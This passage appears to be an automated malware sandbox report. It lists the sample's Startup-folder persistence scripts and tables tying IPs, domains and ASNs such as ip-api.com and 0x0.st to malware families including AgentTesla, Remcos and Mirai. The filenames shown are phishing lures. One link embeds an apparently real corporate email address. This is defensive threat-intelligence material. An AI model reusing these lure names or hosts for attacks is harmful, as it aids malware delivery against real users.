                                                                • Excluded IPs from analysis (whitelisted): 2.19.106.160, 2.19.104.63, 23.60.201.147, 184.86.251.21, 184.86.251.8, 184.86.251.20, 184.86.251.12, 184.86.251.22, 184.86.251.4, 184.86.251.19, 184.86.251.27, 184.86.251.7, 40.126.32.140, 20.190.160.132, 40.126.32.133, 20.190.160.17, 40.126.32.74, 40.126.32.68, 20.190.160.5, 20.190.160.3, 2.19.96.129, 2.19.96.82, 2.19.96.91, 2.19.96.80, 2.19.96.90, 4.245.163.56, 13.107.246.61
                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, p-static.bing.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, cdn.onenote.net.edgekey.net, e86303.dscx.akamaiedge.net, www.bing.com.edgekey.net, wildcard.weather.microsoft.com.edgekey.net, login.live.com, e16604.g.akamaiedge.net, r.bing.com, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, www.bing.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, e15275.d.akamaiedge.net, r.bing.com.edgekey.net, tile-service.weather.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, www-www.bing.com.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, e1553.dspg.akamaiedge.net
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                14:43:14API Interceptor346x Sleep call for process: powershell.exe modified
                                                                14:44:15API Interceptor2x Sleep call for process: svchost.exe modified
                                                                19:43:21AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6dd171fd.cmd
                                                                19:43:35AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_0c891e71.cmd
                                                                19:43:48AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_a276d6c0.cmd
                                                                19:44:01AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_79ced6d4.cmd
                                                                19:44:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_c64e66cc.cmd

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                208.95.112.1pile.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                GAj49U93sg.exeGet hashmaliciousAgentTeslaBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                urzeK6y8gl.exeGet hashmaliciousAgentTeslaBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                devuelto_89676464576485645876464646345433467574687744.exeGet hashmaliciousAgentTeslaBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                NEW ORDER LISTED 2025 VENOKLER S.A PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                kBcQHTMne6.ps1Get hashmaliciousUnknownBrowse
                                                                • ip-api.com/json
                                                                Nuevo Orden_212435988.pdf____________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                s.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                • ip-api.com/line/?fields=hosting
                                                                1.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                • ip-api.com/xml
                                                                payload.ps1Get hashmaliciousKdot StealerBrowse
                                                                • ip-api.com/json/
                                                                168.119.145.117OC 23558 EINSA F2420.vbsGet hashmaliciousUnknownBrowse
                                                                  Teufelberger,pdf.vbsGet hashmaliciousRemcos, PureLog Stealer, zgRATBrowse
                                                                    REMMITTANCE ADVICE- 12.02.25_PNG.vbsGet hashmaliciousUnknownBrowse
                                                                      Attached order.vbsGet hashmaliciousUnknownBrowse
                                                                        tOpxHK0Z2U.batGet hashmaliciousRemcosBrowse
                                                                          5kldoushde.batGet hashmaliciousRemcosBrowse
                                                                            puDUCOeVK6.batGet hashmaliciousRemcosBrowse
                                                                              As7KZaO9Dy.batGet hashmaliciousRemcosBrowse
                                                                                uowzo4rEa5.batGet hashmaliciousRemcosBrowse
                                                                                  BNP_Paribas,pdf.vbsGet hashmaliciousRemcosBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    ip-api.compile.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 208.95.112.1
                                                                                    GAj49U93sg.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    urzeK6y8gl.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    devuelto_89676464576485645876464646345433467574687744.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    NEW ORDER LISTED 2025 VENOKLER S.A PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    kBcQHTMne6.ps1Get hashmaliciousUnknownBrowse
                                                                                    • 208.95.112.1
                                                                                    Nuevo Orden_212435988.pdf____________________________.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 208.95.112.1
                                                                                    s.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                    • 208.95.112.1
                                                                                    1.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                                    • 208.95.112.1
                                                                                    payload.ps1Get hashmaliciousKdot StealerBrowse
                                                                                    • 208.95.112.1
                                                                                    0x0.stOC 23558 EINSA F2420.vbsGet hashmaliciousUnknownBrowse
                                                                                    • 168.119.145.117
                                                                                    Teufelberger,pdf.vbsGet hashmaliciousRemcos, PureLog Stealer, zgRATBrowse
                                                                                    • 168.119.145.117
                                                                                    REMMITTANCE ADVICE- 12.02.25_PNG.vbsGet hashmaliciousUnknownBrowse
                                                                                    • 168.119.145.117
                                                                                    Attached order.vbsGet hashmaliciousUnknownBrowse
                                                                                    • 168.119.145.117
                                                                                    tOpxHK0Z2U.batGet hashmaliciousRemcosBrowse
                                                                                    • 168.119.145.117
                                                                                    5kldoushde.batGet hashmaliciousRemcosBrowse
                                                                                    • 168.119.145.117
                                                                                    puDUCOeVK6.batGet hashmaliciousRemcosBrowse
                                                                                    • 168.119.145.117
                                                                                    As7KZaO9Dy.batGet hashmaliciousRemcosBrowse
                                                                                    • 168.119.145.117
                                                                                    uowzo4rEa5.batGet hashmaliciousRemcosBrowse
                                                                                    • 168.119.145.117
                                                                                    BNP_Paribas,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                    • 168.119.145.117
                                                                                    a-0003.a-msedge.netH3Ze9Uj.exeGet hashmaliciousXWormBrowse
                                                                                    • 204.79.197.203
                                                                                    QEIFBCQW.msiGet hashmaliciousUnknownBrowse
                                                                                    • 204.79.197.203
                                                                                    blessed.ps1Get hashmaliciousFormBookBrowse
                                                                                    • 204.79.197.203
                                                                                    em3.ps1Get hashmaliciousFormBookBrowse
                                                                                    • 204.79.197.203
                                                                                    _747031500 D747031500_A.htmlGet hashmaliciousRemcosBrowse
                                                                                    • 204.79.197.203
                                                                                    747031500_D747031500_A.jsGet hashmaliciousRemcosBrowse
                                                                                    • 204.79.197.203
                                                                                    CYA75gigem.exeGet hashmaliciousVidarBrowse
                                                                                    • 204.79.197.203
                                                                                    N11R7lRasm.exeGet hashmaliciousVidarBrowse
                                                                                    • 204.79.197.203
                                                                                    https://eur01.safelinks.protection.outlook.com/ap/w-59584e83/?url=https%3A%2F%2Finnerworks621-my.sharepoint.com%2F%3Aw%3A%2Fg%2Fpersonal%2Ffbayoumi_iwexpress_com%2FEV18-ULK3bBFgswwIocxhGgB_RycisFJYnuNE85X0INcoQ%3Fe%3DPJWGhb&data=05%7C02%7Cm.schwarzfaerber%40gutmann.de%7Cba71d958cbce4017fe2b08dd4c1498cf%7Cb8afaafb131d4ce28085e6ff7718d438%7C0%7C0%7C638750373515189602%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ%3D%3D%7C0%7C%7C%7C&sdata=jFoC7e8%2BnChKZDPYgfO8Z0D6BEVH0spDWEnRRVzuauE%3D&reserved=0Get hashmaliciousUnknownBrowse
                                                                                    • 204.79.197.203
                                                                                    https://innerworks621-my.sharepoint.com/:w:/g/personal/fbayoumi_iwexpress_com/EV18-ULK3bBFgswwIocxhGgB_RycisFJYnuNE85X0INcoQ?rtime=X7A0bhVM3UgGet hashmaliciousUnknownBrowse
                                                                                    • 204.79.197.203

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    GBTCLOUDUSXClient.exeGet hashmaliciousXWormBrowse
                                                                                    • 45.83.244.141
                                                                                    res.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                    • 216.115.185.244
                                                                                    Ayedz.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                    • 45.13.151.59
                                                                                    apache2.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                    • 45.13.151.59
                                                                                    Ayedz.x86.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                    • 45.13.151.59
                                                                                    Ayedz.mips.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                    • 45.13.151.59
                                                                                    Ayedz.ppc.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                    • 45.13.151.59
                                                                                    sh.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                    • 45.13.151.59
                                                                                    Ayedz.m68k.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                    • 45.13.151.59
                                                                                    Ayedz.Armv61.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                    • 45.13.151.59
                                                                                    HETZNER-ASDEna.elfGet hashmaliciousPrometeiBrowse
                                                                                    • 88.198.246.242
                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                    • 88.198.246.242
                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                    • 88.198.246.242
                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                    • 88.198.246.242
                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                    • 88.198.246.242
                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                    • 88.198.246.242
                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                    • 88.198.246.242
                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                    • 88.198.246.242
                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                    • 88.198.246.242